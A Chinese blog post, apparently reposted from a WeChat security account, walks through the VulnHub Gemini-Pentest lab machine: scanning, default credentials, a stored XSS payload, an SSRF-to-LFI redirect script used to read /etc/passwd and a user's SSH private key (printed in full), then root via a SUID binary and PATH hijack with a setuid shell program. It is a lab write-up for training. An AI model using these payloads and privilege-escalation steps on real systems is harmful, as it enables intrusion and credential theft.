靶机实战系列之Gemini-Pentest靶机

admin
admin
admin
138635
文章
114
评论
2024年2月15日13:58:05评论22 views字数 3964阅读13分12秒阅读模式

声明

该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。 

靶机地址:

https://download.vulnhub.com/geminiinc/Gemini-Pentest-v1.zip

内容简介:

主机发现

端口扫描

开源代码泄漏

XSS漏洞

SSRF漏洞

LFI漏洞

服务端组件漏洞

SSH公钥认证

SUID权限漏洞

环境变量篡改

本地提权

 滑至文末,获取“searchall”下载链接!

1.1 主机发现

arp-scan  -l

靶机实战系列之Gemini-Pentest靶机

1.2 端口扫描

nmap -p-  192.168.112.131

靶机实战系列之Gemini-Pentest靶机

nmap -p22,80 -sC -sV 192.168.112.131

靶机实战系列之Gemini-Pentest靶机

1.3 开源代码泄露

靶机实战系列之Gemini-Pentest靶机

https://github.com/ionutvmi/master-login-systemhttps://github.com/ionutvmi/master-login-system/blob/master/install.php

靶机实战系列之Gemini-Pentest靶机

admin 1234

登录系统

靶机实战系列之Gemini-Pentest靶机

靶机实战系列之Gemini-Pentest靶机

1.4 XSS漏洞

在此   

http://192.168.112.131/test2/user.php?id=1

存在 存储型xss漏洞

靶机实战系列之Gemini-Pentest靶机

<script>alert(1)</script>

靶机实战系列之Gemini-Pentest靶机

靶机实战系列之Gemini-Pentest靶机

1.5 SSRF+LFI漏洞

参考链接 :https://www.virtuesecurity.com/kb/wkhtmltopdf-file-inclusion-vulnerability-2/#http://hassankhanyusufzai.com/SSRF-to-LFI/

kali启动apache2服务

service apache2  startcd  /var/www/html   //进入文件夹vim a.php            //创建文件<?php header('location:file://'.$_REQUEST['url']); ?>  //贴入代码

靶机实战系列之Gemini-Pentest靶机

<iframe height="2000" width="800" src=http://192.168.112.128/a.php?url=%2fetc%2fpasswd></iframe>

靶机实战系列之Gemini-Pentest靶机

存在任意文件读取漏洞

靶机实战系列之Gemini-Pentest靶机

1.6 SSH公钥认证

猜测在gemini1账号下存在公钥私钥认证机制

查找文件名称

/home/gemini1/.ssh/id_rsa/home/gemini1/.ssh/authorized_keys/home/gemini1/.ssh/id_rsa.pub
<iframe height="2000" width="800" src=http://192.168.112.128/a.php?url=/home/gemini1/.ssh/id_rsa></iframe>

靶机实战系列之Gemini-Pentest靶机

-----BEGIN RSA PRIVATE KEY-----MIIEpQIBAAKCAQEAv8sYkCmUFupwQ8pXsm0XCAyxcR6m5y9GfRWmQmrvb9qJP3xs6c11dX9Mi8OLBpKuB+Y08aTgWbEtUAkVEpRU+mk+wpSx54OTBMFX35x4snzz+X5uVl1rUn9Z4QE5SJpOvfV3Ddw9zlVA0MCJGi/RW4ODRYmPHesqNHaMGKqTnRmn3/4Vu7cl+KpPZmQJzASoffyBn1bxQomqTkb5AGhkAggsOPS0xv6P2g/mcmMUIRWaTH4ZDqrpqxFtJbuWSszPhuw3LLqAYry0RlEH/Mdi2RxM3VZvqDRlsV0DO74qyBhBsq+poSbdwoXao8n7oO2ASHc05d2vtmmmGP31+4pjuQIDAQABAoIBAQCq+WuJQHeSwiWYWS46kkNg2qfoNrIFD8Dfy0ful5OhfAiz/sC84HrgZr4fLg+mqWXZBuCVtiyF6IuDeMU/Tdo/bUkUfyflQgbyy0UBw2RZgUihVpMYDKma3oqKKeQeE+k0MDmUsoyqfpeMQMc3//67fQ6uE8Xwnu593FxhtNZoyaYgz8LTpYRsaoui9j7mrQ4Q19VOQ16u4XlZrVtRFjQqBmAKeASTaYpWKnsgoFudp6xyxWzS4uk6BlAom0teBwkcnzx9fNd2vCYRMhK5KLTDvWUf3d+eUcoUy1h+yjPvdDmlC27vcvZ0GXVvyRks+sjbNMYWl+QvNIZn1XxD1nkxAoGBAODe4NKq0r2Biq0V/97xx76oz5zX4drh1aE6X+osRqk4+4soLauIxHaApYWYKlk4OBPMzWQC0a8mQOaL1LalYSEL8wKkkaAvfM604f3fo01rMKn9vNRC1fAms6caNqJDPIMvOyYRe4PALNf6Yw0Hty0KowC46HHkmWEgw/pEhOZdAoGBANpYAJEhiG27iqxdHdyHC2rVnA9o2t5yZ7qqBExF7zyUJkIbgiLLyliE5JYhdZjd+ablaSdSvTKOqrxscnPmWVIxDyLDxemH7iZsEbhLkIsSKgMjCDhPBROivyQGfY17EHPu968rdQsmJK8+X5aWxq08VzlKwArm+GeDs2hrCGUNAoGAc1G5SDA0XNz3CiaTDnk9r0gRGGUZvU89aC5wi73jCttfHJEhQquj3QXCXM2ZQiHzmCvaVOShNcpPVCv3jScotXLUT9GnoNdZkQPwNWqf648B6NtoIA6aekrOrO5jgDks6jWphq9GgV1nYedVLpR7WszupOsuwWGzSr0r48eJxD0CgYEAo23HTtpIocoEbCtulIhIVXj5zNbxLBt55NApU2XtQeyqDkVEzQK4vDUMXAtDWF6d5PxGDvbxQoxi45JQwMukA89QwvbChqAF86BkSwvUbyPzalGob21GIYJpi2+IPoPktsIhhm4Ct4ufXcRUDAVjRHur1ehLgl2LhP+hJAEpUWkCgYEAj2kz6b+FeK+xK+FUuDbd88vjU6FB8+FL7mQFQ2Ae9IWNyuTQSpGhvXAtW/c+eaiO4gHRz60wW+FvItFa7kZAmylCAugK1m8/Ff5VZ0rHDP2YsUHT4+Btj8XYDMgMA8VYk6alU2rEEzqZlru7BZiwUnz7QLzauGwg8ohv1H2NP9k=-----END RSA PRIVATE KEY-----
<iframe height="2000" width="800" src=http://192.168.112.128/a.php?url=/home/gemini1/.ssh/authorized_keys></iframe>

靶机实战系列之Gemini-Pentest靶机

ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAABAQC/yxiQKZQW6nBDyleybRcIDLFxHqbnL0Z9FaZCau9v2ok/fGzpzXV1f0yLw4sGkq4H5jTxpOBZsS1QCRUSlFT6aT7ClLHng5MEwVffnHiyfPP5fm5WXWtSf1nhATlImk699XcN3D3OVUDQwIkaL9Fbg4NFiY8d6yo0dowYqpOdGaff/hW7tyX4qk9mZAnMBKh9/IGfVvFCiapORvkAaGQCCCw49LTG/o/aD+ZyYxQhFZpMfhkOqumrEW0lu5ZKzM+G7DcsuoBivLRGUQf8x2LZHEzdVm+oNGWxXQM7virIGEGyr6mhJt3Chdqjyfug7YBIdzTl3a+2aaYY/fX7imO5 gemini1@geminiinc
<iframe height="2000" width="800" src=http://192.168.112.128/a.php?url=/home/gemini1/.ssh/id_rsa.pub></iframe>

与authorized_keys文件一致,可以判断出用私钥公钥登录gemini1账号

靶机实战系列之Gemini-Pentest靶机

创建 id_rsa文件并赋予权限 400

vim   id_rsachmod 400  id_rsassh  -i  id_rsa  gemini1@192.168.112.132  //登录

靶机实战系列之Gemini-Pentest靶机

靶机实战系列之Gemini-Pentest靶机

1.7 SUID权限漏洞

查找属主root 带有suid权限文件find  / -user  root  -type f -perm -u+sx   -ls  2>/dev/null

靶机实战系列之Gemini-Pentest靶机

发现listinfo文件有问题,像是ifconfig ,netstat命令集合体

靶机实战系列之Gemini-Pentest靶机

file  /usr/bin/listinfostrings /usr/bin/listinfo

靶机实战系列之Gemini-Pentest靶机

靶机实战系列之Gemini-Pentest靶机

利用date文件进行提权

靶机实战系列之Gemini-Pentest靶机

创建一个 date 程序

vi  date.c写入以下代码#include <sys/types.h>#include <unistd.h>#include <stdlib.h>int main(){  setuid(0);  setgid(0);  system("/bin/bash");}

靶机实战系列之Gemini-Pentest靶机

靶机实战系列之Gemini-Pentest靶机

修改系统路径

echo $PATHexport PATH=/home/gemini1:$PATH

靶机实战系列之Gemini-Pentest靶机

提权成功

靶机实战系列之Gemini-Pentest靶机

注:如有侵权请后台联系进行删除

觉得内容不错,请点一下"赞"和"在看"

靶机实战系列之Gemini-Pentest靶机

原文始发于微信公众号(嗨嗨安全):靶机实战系列之Gemini-Pentest靶机

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月15日13:58:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   靶机实战系列之Gemini-Pentest靶机https://cn-sec.com/archives/2195569.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息